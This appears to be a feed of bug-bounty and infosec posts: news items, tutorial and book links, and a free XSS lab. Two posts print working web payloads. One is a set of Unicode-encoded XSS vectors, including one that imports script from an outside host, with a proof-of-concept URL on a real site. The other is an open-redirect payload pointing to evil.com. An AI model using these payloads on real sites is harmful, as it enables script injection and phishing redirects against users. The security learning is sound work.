Forwarded from The Hacker News
A 23-year-old Russian national has been indicted in the U.S. and added to the FBI's Cyber Most Wanted list for allegedly administering a cybercrime forum that sold stolen login credentials, personal and credit card data.
Read: https://thehackernews.com/2022/03/23-year-old-russian-hacker-wanted-by.html
Unicode #XSS Vectors
Courtesy of @KN0X55
<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%https://t.co/CV0GcKUoK1%C0%A7%C0%A9%C0%BE
PoC: https://bbs.tianya.cn/tag/--%3E%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
Open Redirection issue :
Payload : ///////////////////////////evil.com
Vuln URL:
https://example.com/account/login
Valid Parameter: ?next=
Affected URL :
https://example.com/account/login/?next=///////////////////////////evil.com
#bugbounty #bugbountytips #Redirection
FUZZING FOR BEGINNERS (KUGG teaches STÖK American fuzzy lop)
Credit :- stok
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #resources
https://www.youtube.com/watch?v=O3hb6HV1ZQo&feature=youtu.be
In this episode of "STÖK, time to learn something new", KUGG (Christoffer Jerkeby) from F-Secure shows STÖK the basics of FUZZING using American Fuzzy Lop. They FUZZ an HTTP server and get two crashes, crashes that with the right exploit could give an attacker…
Blind Cross Site Scripting (XSS) Overview - Bug Bounty Hunting & Web App Pentesting
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #XSS #Blind_XSS
https://t.co/Ijnjjv6ujb
Sponsor: https://go.intigriti.com/thecybermentor
Links:
https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
https://xsshunter.com
https://medium.com/bugbountywriteup/blind-xss-for-beginners-c88e48083071
❓Info❓…
Recommended Books That Increase Your Level from Scratch to Advanced in Web Pentesting
Top 5 Books 📕:-
1⃣ The Web Application Hacker's Handbook
2⃣ Web Hacking 101
3⃣ Mastering Modern Web Penetration Testing by Prakhar Prasad
4⃣ Seven Deadliest Web Application Attacks
5⃣ The Browser Hacker's Handbook
🤡 SAML Zine 🤡
@boxyhq presents the SAML Zine 🎉🎉🥳💘😍
Grab it for Free -> https://t.co/AXTmzxS1Gs and let us know how you like it.
Share for more reach. 😎
#infosec #appsec #security #securityzines #bugbountytips #bugbounty
Exploiting DOM Based XSS via Misconfigured postMessage() Function
https://medium.com/@armaanpathan/exploiting-dom-based-xss-via-misconfigured-postmessage-function-bfc794969a0a
Today, we will be discussing how to exploit DOM-based XSS through a misconfigured postMessage function. Two sites can communicate with each…
FREE LAB ALERTTTT
https://hackxpert.com/RXSS/GET/00.php?fname=
Can you find the XSS?
If you can't, make sure to check the comments for a hint.
Forwarded from The Hacker News
Hackers are exploiting recently disclosed critical Spring4Shell vulnerability to execute the Mirai botnet.
Read details: https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html
Forwarded from Bug Bounty
☝️🌿 Some books that will help you go from beginner to advanced in cyber security